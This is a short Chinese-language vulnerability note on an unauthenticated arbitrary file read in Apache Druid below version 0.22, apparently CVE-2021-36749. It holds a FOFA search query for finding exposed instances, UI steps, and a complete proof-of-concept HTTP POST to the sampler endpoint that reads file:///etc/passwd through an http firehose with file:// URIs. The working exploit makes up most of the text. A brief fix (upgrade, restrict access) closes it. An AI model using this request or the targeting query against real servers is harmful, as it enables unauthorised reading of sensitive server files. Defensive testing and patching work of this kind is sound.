漏洞原理:
由於用戶指定 HTTP InputSource 沒有做出限制,可以通過將文件 URL 傳遞給 HTTP InputSource 來繞過應用程序級別的限制。由於 Apache Druid 默認情況下是缺乏授權認證,攻擊者可利用該漏洞在未授權情況下,構造惡意請求執行文件讀取,最終造成服務器敏感性信息泄露。
影響版本:
Apache Druid Version < 0.22
fofa語法:
title="Apache Druid"漏洞測試:
主界面–>Load data –>HTTP(s)–>Connect Data–>URIs(使用file://協議進行讀取)
file:///bin/
file:///etc/passwd
POC:
POST /druid/indexer/v1/sampler?for=connect HTTP/1.1
Host: 127.0.0.1:8888
Content-Length: 413
Accept: application/json, text/plain, */*
Origin: http://127.0.0.1:8888
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.81 Safari/537.36 SE 2.X MetaSr 1.0
Content-Type: application/json;charset=UTF-8
Referer: http://127.0.0.1:8888/unified-console.html
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
{"type":"index","spec":{"type":"index","ioConfig":{"type":"index","firehose":{"type":"http","uris":["file:///etc/passwd"]}},"dataSchema":{"dataSource":"sample","parser":{"type":"string","parseSpec":{"format":"regex","pattern":"(.*)","columns":["a"],"dimensionsSpec":{},"timestampSpec":{"column":"!!!_no_such_column_!!!","missingValue":"2010-01-01T00:00:00Z"}}}}},"samplerConfig":{"numRows":500,"timeoutMs":15000}}
修復方法:
升級版本,設置訪問權限
參考:
https://www.cnblogs.com/cn-gov/p/15572281.html
https://github.com/BrucessKING/CVE-2021-36749